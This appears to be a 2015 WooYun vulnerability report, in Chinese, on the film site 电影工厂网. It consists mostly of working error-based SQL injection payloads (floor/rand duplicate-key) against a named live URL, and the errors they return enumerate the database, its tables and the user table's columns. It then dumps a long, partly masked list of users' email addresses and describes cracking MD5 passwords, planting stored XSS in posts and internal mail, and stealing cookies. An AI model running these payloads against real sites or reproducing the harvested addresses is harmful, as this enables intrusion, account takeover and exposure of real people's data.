当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099810

漏洞标题:电影工厂网存储跨站+注射漏洞(手工floor强制报错)

相关厂商:电影工厂

漏洞作者: 千斤拨四两

提交时间:2015-03-09 14:57

修复时间:2015-04-23 14:58

公开时间:2015-04-23 14:58

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注射出员工用户名密码,发布消息,发布消息出存在存储xss,内部的发送邮件出也有存储xss。

详细说明:

URL:
http://www.dianyinggongchang.com/?c-feedback-a-addfeedback
poc:

爆出数据库版本,数据库,用户名:
cont=1' and (select 1 from (select count(*),concat(version(),0x3a,database(),0x3a,user(),0x3a,floor(rand(0)*2))x from information_schema.tables 
group by x)a) and '1=1&email=sample%40email.tst&uid=0
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '5.1.49-community:m:m@localhost:1' for key 'group_key'
cont=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM 
information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) 
and '1=1&email=sample%40email.tst&uid=0
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '~'information_schema'~1' for key 'group_key'
得到第一个库information_schema
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '~'m'~1' for key 'group_key' 得到第二个库m
爆m数据库的表
m的16进制为:0x6D
爆m数据库的表总数:
cont= 1' and(select 1 from(select count(*),concat((select (select (SELECT distinct count(*) FROM information_schema.tables where 
table_schema=0x6D)) from information_schema.tables limit 0,1),0x7e,0x27,floor(rand(0)*2))x from information_schema.tables group by x)a) and 
'1=1&email=sample%40email.tst&uid=0
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '22~'1' for key 'group_key'
得到m数据库的表总数22
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry 'm_advarea~'1' for key 'group_key'
得到m数据库的第一个表m_advarea
以此类推修改行数,爆出m数据库所有的表名:
m_advarea
m_album
m_bulletin
m_comment
m_complaints
m_favorites
m_feedback
m_friend
m_help
m_link
m_message
m_share
m_tool
m_user
m_webinfo
m_work
p_region
s_advarea_adv
s_tool_category
s_tool_tag
s_user_actor
s_user_file
爆表m_user的字段
user的16进制为:0x6D5F75736572
爆m_user表的字段总数:
cont=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct count(*) FROM information_schema.columns where 
table_name=0x6D5F75736572 and table_schema=0x6D)) from information_schema.columns limit 0,1),0x7e,0x27,floor(rand(0)*2))x from 
information_schema.columns group by x)a) and '1=1&email=sample%40email.tst&uid=0
得到m_user表的字段总数17
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '17~'1' for key 'group_key'
得到m_user表的第一个字段uid
cont=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct column_name FROM information_schema.columns where 
table_name=0x6D5F75736572 and table_schema=0x6D limit 0,1)) from information_schema.columns limit 0,1),0x7e,0x27,floor(rand(0)*2))x from 
information_schema.columns group by x)a) and '1=1&email=sample%40email.tst&uid=0
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry 'uid~'1' for key 'group_key'
以此类推m_user中17个字段:
uid
username
realname
sex
province
city
jobs1
jobs2
jobs3
birthday
regtime
regip
pwd
avatar
num
hots
isbirthday


下面是员工用户名密码:



mask 区域


*****+-----------------*****
*****| username        *****
*****+-----------------*****
*****| jayrao2008@Yahoo*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected] *****
*****| freeguojian@foxm*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| yuyuivv8844@163.*****
*****| [email protected]*****
*****| [email protected] *****
*****| xuexd000@hotmail*****
*****| [email protected]*****
*****| [email protected]*****
*****| zyx2236@hotmail.*****
*****| [email protected]*****
*****| yechangqing@sanm*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]  *****
*****| jessicahfbbcwv@h*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| asd63513838@163.*****
*****| zhenganzhao@163.*****
*****| guang7846@yahoo.*****
*****| [email protected].*****
*****| szw02100210@163.*****
*****| [email protected]*****
*****| maoxiaoyang1990@*****
*****| liubinhong008@ya*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| eheart_chen@163.*****
*****| [email protected]*****
*****| waihuikoo21@163.*****
*****| haizi_504@hotmai*****
*****| sunstory0629@sin*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| 18601213469@163.*****
*****| xx.xx_xx.xx_xx.x*****
*****| [email protected]*****
*****| [email protected] *****
*****| huhaoran77@foxma*****
*****| [email protected]*****
*****| lucas.ours@gmail*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| fxg882000@yahoo.*****
*****| fxg882000@yahoo.*****
*****| [email protected]*****
*****| [email protected]*****
*****| anikijiro@gmail.*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| dinggewenhua@163*****
*****| [email protected]  *****
*****| blackknight_gao@*****
*****| hongshaorou1979@*****
*****| [email protected]*****
*****| [email protected]   *****
*****| [email protected] *****
*****| [email protected]*****
*****| zzzzz5qqqq4@163.*****
*****| [email protected]*****
*****| tongxiaofeng125@*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| darenyingzhi@163*****
*****| wangjie900123@12*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected] *****
*****| xiaofenggu0307@g*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]    *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| zhurikun@fanhall*****
*****| www.498502213@qq*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]   *****
*****| lion.brige@gmail*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]  *****
*****| [email protected]*****
*****| qq_dong@hotmail.*****
*****| [email protected]*****
*****| [email protected]*****
*****| xiaochuang0413@s*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| treeing616@hotma*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| donjian041218@gm*****
*****| [email protected]    *****
*****| [email protected]*****
*****| [email protected]*****
*****| kevinwzj@hotmail*****
*****| [email protected] *****
*****| hezhikun1987@126*****
*****| [email protected]*****
*****| mary_871224@163.*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]  *****
*****| scz83321588@163.*****
*****| [email protected]*****
*****| yaojinglive@126.*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| shuaiguoqingsy@1*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| cailipinggeili@1*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| 158621477852@163*****
*****| 158621477852@163*****
*****| liyidi1983@hotma*****
*****| gaoshuaiyouxiang*****
*****| [email protected]    *****
*****| sjzez12star@163.*****
*****| watcher486@gmail*****
*****| [email protected]*****
*****| [email protected]*****
*****| 13998430333@139.*****
*****| [email protected]*****
*****| jinhongjiang88@y*****
*****| [email protected]  *****
*****| aufoochu@aliyun.*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| hekunyang@hotmai*****
*****| ameliagaojun@gma*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| yangyu5633@sina.*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| daxingeking@163.*****
*****| [email protected]*****
*****| liangjb9527@126.*****
*****| malance1019@163.*****
*****| [email protected]*****
*****| [email protected]    *****
*****| [email protected]   *****
*****| [email protected]  *****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]  *****
*****| [email protected]*****
*****| [email protected]  *****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]  *****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| louisianafrancis*****
*****| [email protected]  *****
*****| [email protected]*****
*****| moguizaixinli@16*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]    *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| onlyonlycong@163*****
*****| elainejuanzi@163*****
*****| [email protected]*****
*****| [email protected]*****
*****| fanghon8994@sina*****
*****| [email protected]*****
*****| haifeng.v@gmail.*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| 15815513075@126.*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]   *****
*****| lanruo2005@yahoo*****
*****| aaaaliang@hotmai*****
*****| [email protected]   *****
*****| [email protected]   *****
*****| [email protected] *****
*****--+--------------*****


漏洞证明:

解密员工md5密码,进入后台发布帖子:

q.png


标题栏,内容,图片说明都存在xss,嵌入代码,下面看看效果:

1.png


登录另一个用户点击测试:

2.png


3.png


直接打到cookie。
后台还有一处发送邮件功能,继续测试:

4.png


登录测试用户的后台收取邮件:

5.png


6.jpg


成功打到cookie:

gg.png


哈哈,测试成功,要是测试管路员的话,标题比较吸引,你们懂的!!!

修复方案:

你们更专业!!!

版权声明:转载请注明来源 千斤拨四两@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝